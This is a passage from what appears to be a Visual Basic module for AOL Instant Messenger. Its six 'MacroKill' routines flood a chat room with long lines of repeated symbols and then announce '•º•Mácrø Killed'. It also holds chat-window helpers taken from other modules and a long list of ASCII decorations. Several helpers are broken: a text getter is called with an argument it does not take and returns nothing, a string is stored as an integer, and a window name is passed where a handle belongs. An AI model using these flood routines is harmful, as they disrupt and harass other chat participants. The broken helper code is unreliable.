Aim_Chat_Send_Normal ("%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@")
Aim_Chat_Send_Normal ("%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@")
Aim_Chat_Send_Normal ("%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@")
Aim_Chat_Send_Normal ("%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@%-@-%-@")
Aim_Chat_Send_Normal ("•º•Mácrø Killed")
End Sub
Sub Aim_Chat_Send_MacroKill2()
Aim_Chat_Send_Normal ("*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%")
Aim_Chat_Send_Normal ("*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%")
Aim_Chat_Send_Normal ("*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%")
Aim_Chat_Send_Normal ("*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%")
Aim_Chat_Send_Normal ("•º•Mácrø Killed")
End Sub
Sub Aim_Chat_Send_MacroKill3()
Aim_Chat_Send_Normal ("=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^")
Aim_Chat_Send_Normal ("=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^")
Aim_Chat_Send_Normal ("=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^")
Aim_Chat_Send_Normal ("=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^")
Aim_Chat_Send_Normal ("•º•Mácrø Killed")
End Sub
Sub Aim_Chat_Send_MacroKill4()
Aim_Chat_Send_Normal ("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
Aim_Chat_Send_Normal ("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
Aim_Chat_Send_Normal ("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
Aim_Chat_Send_Normal ("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
Aim_Chat_Send_Normal ("•º•Mácrø Killed")
End Sub
Sub Aim_Chat_Send_MacroKill5()
Aim_Chat_Send_Normal ("`~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~`")
Aim_Chat_Send_Normal ("`~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~`")
Aim_Chat_Send_Normal ("`~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~`")
Aim_Chat_Send_Normal ("`~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~``~`~`~`~`")
Aim_Chat_Send_Normal ("•º•Mácrø Killed")
End Sub
Sub Aim_Chat_Send_MacroKill6()
Aim_Chat_Send_Normal ("$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$")
Aim_Chat_Send_Normal ("$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$")
Aim_Chat_Send_Normal ("$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$")
Aim_Chat_Send_Normal ("$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$=$=$$=$")
Aim_Chat_Send_Normal ("•º•Mácrø Killed")
End Sub
Function ReplaceString(MyString As String, ToFind As String, ReplaceWith As String) As String
'taken from dos32.bas
Dim Spot As Long, NewSpot As Long, LeftString As String
Dim RightString As String, NewString As String
Spot& = InStr(LCase(MyString$), LCase(ToFind))
NewSpot& = Spot&
Do
If NewSpot& > 0& Then
LeftString$ = Left(MyString$, NewSpot& - 1)
If Spot& + Len(ToFind$) <= Len(MyString$) Then
RightString$ = Right(MyString$, Len(MyString$) - NewSpot& - Len(ToFind$) + 1)
Else
RightString = ""
End If
NewString$ = LeftString$ & ReplaceWith$ & RightString$
MyString$ = NewString$
Else
NewString$ = MyString$
End If
Spot& = NewSpot& + Len(ReplaceWith$)
If Spot& > 0 Then
NewSpot& = InStr(Spot&, LCase(MyString$), LCase(ToFind$))
End If
Loop Until NewSpot& < 1
ReplaceString$ = NewString$
End Function
Sub RunMenuByString(Application, StringSearch)
'originally taken from dos32.bas
'From Hix he gets full credit
Dim ToSearch As Integer, MenuCount As Integer, FindString
Dim ToSearchSub As Integer, MenuItemCount As Integer, GetString
Dim SubCount As Integer, MenuString As String, GetStringMenu As Integer
Dim MenuItem As Integer, RunTheMenu As Integer
ToSearch% = GetMenu(Application)
MenuCount% = GetMenuItemCount(ToSearch%)
For FindString = 0 To MenuCount% - 1
ToSearchSub% = GetSubMenu(ToSearch%, FindString)
MenuItemCount% = GetMenuItemCount(ToSearchSub%)
For GetString = 0 To MenuItemCount% - 1
SubCount% = GetMenuItemID(ToSearchSub%, GetString)
MenuString$ = String$(100, " ")
GetStringMenu% = GetMenuString(ToSearchSub%, SubCount%, MenuString$, 100, 1)
If InStr(UCase(MenuString$), UCase(StringSearch)) Then
MenuItem% = SubCount%
GoTo MatchString
End If
Next GetString
Next FindString
MatchString:
RunTheMenu% = SendMessage(Application, WM_COMMAND, MenuItem%, 0)
End Sub
Function Aim_Chat_Get_NumUsers() As Integer
'taken from digitalaimgold.bas
'gets number of users in the chat.
Dim AimChatWin As Long, NumStat As Long, HowMany As String
Dim clear As String, Clear2 As Integer
AimChatWin& = FindWindow("AIM_ChatWnd", vbNullString)
NumStat& = FindWindowEx(AimChatWin&, 0, "_Oscar_Static", vbNullString)
HowMany$ = Aim_Chat_Get_Text(NumStat)
clear$ = ReplaceString(HowMany$, " person here", "")
Clear2% = ReplaceString(HowMany$, " people here", "")
Aim_Chat_Get_NumUsers = Clear2%
End Function
Function Aim_Chat_Get_Text()
'gets text from chat window.
Dim aimchatwnd As Long, WndAte32Class As Long, ate32class As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, 0&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
Dim TheText As String, TL As Long, GetText As String
TL& = SendMessageLong(ate32class&, WM_GETTEXTLENGTH, 0&, 0&)
TheText$ = String$(TL& + 1, " ")
Call SendMessageByString(ate32class&, WM_GETTEXT, TL + 1, TheText$)
GetText$ = Left(TheText$, TL&)
End Function
Function Aim_Chat_Get_Language() As String
'taken from digitalaim.bas
' Gets the Chats language
Dim RoomInfo As Long, ChStat As Long, BrdStat As Long
Dim RnStat As Long, lStat As Long, DVDStat As Long, LangStat As Long
Dim GetIt As String, ChatWindow As Long
ChatWindow& = FindWindow("AIM_ChatWnd", vbNullString)
If ChatWindow& <> 0& Then
GoTo Start
Else
Aim_Chat_Get_Language = "[Not in room.]"
Exit Function
End If
Start:
ChatWindow& = FindWindow("AIM_ChatWnd", vbNullString)
Call RunMenuByString(ChatWindow&, "&Chat Room Info...")
RoomInfo& = FindWindow("AIM_CtlGroupWnd", "Chat Room Info")
ChStat& = FindWindowEx(RoomInfo&, 0, "_Oscar_Static", vbNullString)
BrdStat& = FindWindowEx(RoomInfo&, ChStat&, "_Oscar_Static", vbNullString)
RnStat& = FindWindowEx(RoomInfo&, BrdStat&, "_Oscar_Static", vbNullString)
lStat& = FindWindowEx(RoomInfo&, RnStat&, "_Oscar_Static", vbNullString)
DVDStat& = FindWindowEx(RoomInfo&, lStat&, "_Oscar_Static", vbNullString)
LangStat& = FindWindowEx(RoomInfo&, DVDStat&, "_Oscar_Static", vbNullString)
GetIt$ = Aim_Chat_Get_Text(LangStat&)
Aim_Chat_Get_Language = GetIt$
Call Window_Kill("AIM_CtlGroupWnd")
End Function
Sub Window_Kill(THeWindow$)
Call PostMessage(THeWindow$, WM_CLOSE, 0&, 0&)
End Sub
Sub ASCII()
'lots of ascii
'people use them to make there programs look nice\cool
'provided by enigma32.bas
'.·´`·.·×·•(
'· ·•(`·-·°·-·')•· ·
'•[¦]•.··•
'«–+†‡†+–·•(¤
' "¤)•·-+†‡†+–»"
' "(¯`·._.·´¯)"
' "..·::{-(··°²³·¤ "
' ".·´¯`·-"
' "¨˜°²·°¯`•"
' "[¦=--- ^v^ "
' "‹¬v›"
' "•‹l›•"
' "•º•"
' " · ··÷"
' ".·´`·."
' "£›– "
'"—€›"
' "‹f›"
' "-^v´)-]-› "
' "‹-[-(`v^- "
' "°º°˜¨¯`•"
' "•´¯¨˜°º°"
' "·•×:·..·:ו"
' "(¯`·._.×..·´¯`·..//> "
' "‹›"
' "‹‹››"
' "«›"
' "‹»"
' "‹v"
' " v›"
' "‹v›"
' "‹v^v›"
' "‹v^•"
' "•^v›"
' "[|]"
' "[¦]"
' "]["
' "|¦|"
' "[•]"
' "]•["
' "•[i]•"
' "•[¦]•"
' "]¦•¦["
' "[¦•¦]"
' "•·:¦["
' "]¦:·•"
' "‚¡iÏi¡‚"
' "ï-¡•¡-ï"
' "•ו"
' "¤•×"
' "ו¤"
' "(`·."
' ".·´)"
' ".·´)(`·."
' ".·:"
' ":·."
' "...··:"
' ":··... "
' ".·´"
' "`·."
' "..·´¯`·.."
' "`·....·´¯ "
' "¯`·....·´"
' ".·´¯`·.·´¯`·."
'"·._.·"
' "·..·´¯`·..·"
' ".·´¯\_.··"
' "··._/¯`·."
' "¯\_"
' "_/¯"
' "·÷×(`··"
' "··´)×÷·"
' "(]•[)‹v^•"
' "•^v›(]•[)"
' "-·~¹'°¨°'¹i|¡"
' "¡|i¹'°¨°'¹~·-"
' ".··.•÷(`·"
' "–·¹°¨¯)·•"
' "[{-._.-¤"
' "¤-._.-}]"
' ".·´¯\_.··"
' "··._/¯`·."
' "(•— "
' ")•— "
' "•´¯`·../)"
' "¨•._.·v°˜\/`°v·._)"
' "...·::"
' "::·..."
' "(¦:···÷ ¦:·"
' "·:¦ ÷··:¦) "
' "•÷·· · ··÷•"
' "· ··•"
' "..··¨¨··-»"
' "¤•••"
' "•••¤"
' "•–^v^•"
' "‹›·´¯`·._.·•{"
' "º¯`v´¯¯)"
' "^v^"
' "ºo"
' "oº"
' ".-¤x"
' "x¤-."
' "°¤°¤"
' "º·.·.·-.·º"
' "‹)-(\›‹/)(\›-›"
' ". ·(°·-¤"
' "¤-·°)·."
' "•·.· ')"
' "/`·....·´¯ |> "
' "¯\_oº° "
' "(' ·.·•"
' "`·.,¸¸,.·´¯"
' "¯`·.,¸¸,.·´"
' "•·«v^v»·•"
' "•´`·.·´`• "
' "•´`·..í"
' "ì..·´`•"
' "‹—•(["
' "])•—›"
' "(.•ˆ•… "
' "×—•‹›í¦ì‹›"
' "›‹ì¦í›‹•—×"
' "…•ˆ•.)"
' "•÷ •· ·× "
' "×· ·• ÷•"
' "׺°”˜`”°º× "
' "((›‹–›"
' "‹–›‹))"
' "•-¬-•"
' "¹·º"
' "²·º"
' "³·º"
' ",.·~°'º°”˜˜˜˜`·.,¸.,¸.·`˜˜`°º'°~·.,¸"
' ""
' "¸.-·~²°˜¨'·.¸,¸..·´`·..¸,¸.·'¨˜°²~·-.¸"
' ""
' "¸,.-·~¬²°''˜¨`·.,¸¸,.·´¨˜''°²¬~·-.,¸"
' "¸.-~·*'˜¨¯`·¸"
' "¸·`¯¨˜'*·~-.¸"
' "`·,¸¸..-·*˜"
' ",.·~°'º°”˜,.·~°˜`°~·.,˜`°º'°~·.,"
' ".·.´¸¯¸`.·.,¸¸,.·.´¸¯¸`.·._."
' "¨˜°²~·-.¸.¸,¸.·'`·..·´'·.¸,¸.¸.-·~²°˜¨"
' "¨˜ ''°²¬~·-.,¸¸,.·´`·.,¸¸,.-·~¬²°''˜¨"
' "°~·.,¸.,¸.,¸,.·`°'º°`·¸..,¸,.¸,.·~°'"
'"´¨˜”°*³`×.„¸‚·×·,¸„.×´³*º°”˜¨`"
' "´¨˜”°*³`~•·.„¸¸„.·•~´³*º°”˜¨`"
' "º '°~·.,'°~·.,,.·~°,.·~°'º"
' "_¸,.-~²°˜¨\¯/¨˜°²~-.,¸_"
' "·´¯`·._.·´¯`·._.·´¯`·._."
' "_.-~²°²~-._"
' "¯¨˜°²~-.,¸/_\¸,.-~²°˜¨¯"
' "¨˜ˆ”°¹~·-.„¸¸„.-·~¹°”ˆ˜¨"
' "¯`·.,¸¸¸,.·´¯"
' "º° '˜`¨¨˜''°º°'˜`¨¨"
' "¨¨`˜'°º°''˜¨¨`˜'°º"
' "¸,.-·~¬²°''˜¨"
' "¨˜ ''°²¬~·-.,¸"
' "¸‚.-·~¬ˆ‘´"
' "`ˆ'¬~·-.,¸"
' "¸‚·ª˜¨˜ª· , ¸"
' "¨˜ª· , ¸, ·ª˜¨"
' "¨˜°²~·-.¸"
' "¸.-·~²°˜¨"
' "`·.,¸"
' "¸ , .·´"
' "²°˜¨¯¨˜°²"
' ",-·~·-.,¸"
' "¸,.-·~·-,"
' "`°²·-.,¸"
' ".¸ , ¸.· '"
' "'·.¸,¸."
' "~·- .,¸"
' "¸,. -·~"
' "·²°˜¨¨˜°²·"
' "·²°˜¨"
' "¨˜°²·"
' "¯¯¯"
' "___"
' "~"
' "`"
' "!"
' "@"
' "#"
' "$"
' "%"
' "^"
' "&"
' "*"
' "("
' ")"
' "-"
' "="
' "+"
' "{"
' "}"
' "["
' "]"
' "|"
' "\"
' ":"
' ";"
' "/"
' "?"
' ","
' "<"
' "."
' ">"
' "ƒ"
' "…"
' "†"
' "‡"
' "ˆ"
' "‰"
' "Š"
' "‹"
' "Œ"
' "‘"
' "•"
' "–"
' "—"
' "™"
' "š"
' "›"
' "œ"
' "Ÿ"
' "¡"
' "¢"
' "£"
' "¤"
' "¥"
' "¦"
' "§"
' "¨"
' "©"
' "ª"
' "«"
' "¬"
' "®"
' "¯"
' "°"
' "±"
' "²"
' "³"
' "µ"
' "¶"
' "·"
' "¹"
' "º"
' "»"
' "¼"
' "½"
' "½"
' "¿"
' "À"
' "Á"
' "Â"
' "Ã"
' "Ä"
' "Å"
' "Æ"
' "Ç"
' "È"
' "É"
' "Ê"
' "Ë"
' "Ì"
' "Î"
' "Ï"
' "Ð"
' "Ñ"
' "Ò"
' "Ó"
' "Ô"
' "Õ"
' "Ö"
' "×"
' "Ø"
' "Û"
' "Ú"
' "Ü"
' "Ú"
' "Ý"
' "Þ"
' "ß"
' "à"
' "á"
' "â"
' "ã"
' "ä"
' "å"
' "æ"
' "ç"
' "è"
' "é"
' "ê"
' "ë"
' "ì"
' "í"
' "î"
' "ï"
' "ð"
' "ñ"
' "ò"
' "ó"
' "ô"
' "õ"
' "ö"
' "÷"
' "ø"
' "ù"
' "ú"
' "û"
' "ü"
' "ý"
' "þ"
' "ÿ"
End Sub